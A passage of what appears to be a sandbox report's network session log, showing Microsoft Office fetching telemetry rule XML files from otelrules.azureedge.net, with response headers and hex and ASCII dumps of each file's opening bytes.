                                                                                                                                                                                        2024-11-24 01:14:09 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        119192.168.2.54988913.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:11 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:11 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1401
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                        x-ms-request-id: 3385e8da-101e-00a2-400c-3d9f2e000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011411Z-178bfbc474b7cbwqhC1NYC8z4n000000057g000000004na6
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:11 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        120192.168.2.54989013.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:11 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:11 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1364
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                        ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                        x-ms-request-id: 38badaf1-c01e-00ad-2128-3da2b9000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011411Z-178bfbc474btvfdfhC1NYCa2en00000005ag00000000bt9z
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:11 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        121192.168.2.54989113.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:11 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:11 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1391
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                        x-ms-request-id: 23c3770b-601e-0084-293a-3c6b3f000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011411Z-178bfbc474bgvl54hC1NYCsfuw000000059g000000005ude
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:11 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        122192.168.2.54989213.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:11 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:11 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1354
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                        x-ms-request-id: dd43f91c-901e-005b-7e7f-3b2005000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011411Z-174c587ffdf8fcgwhC1TEBnn7000000003wg00000000c1wn
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:12 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        123192.168.2.54989313.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:11 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:12 UTC495INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:12 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                        x-ms-request-id: f26cc31d-e01e-0085-3f0e-3ec311000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011411Z-15b8b599d889fz52hC1TEB59as00000003kg00000000mk0s
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_MISS
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:12 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        124192.168.2.54989413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:13 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:13 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                        x-ms-request-id: a05be428-e01e-0071-524a-3d08e7000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011413Z-15b8b599d88vp97chC1TEB5pzw00000003p000000000dzca
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:14 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        125192.168.2.54989613.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:13 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:13 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDF497570"
                                                                                                                                                                                        x-ms-request-id: ff0b0d52-c01e-002b-2681-3b6e00000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011413Z-174c587ffdfldtt2hC1TEBwv9c00000003ng000000003cph
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:14 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        126192.168.2.54989713.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:13 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:14 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                        x-ms-request-id: 18ec886b-801e-0078-7044-3cbac6000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011414Z-178bfbc474bmqmgjhC1NYCy16c00000005eg0000000002fe
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:14 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        127192.168.2.54989513.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:13 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:14 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                        x-ms-request-id: 5c785bae-401e-0083-638c-3a075c000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011414Z-178bfbc474bnwsh4hC1NYC2ubs000000057000000000k5np
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:14 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        128192.168.2.54989813.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:14 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
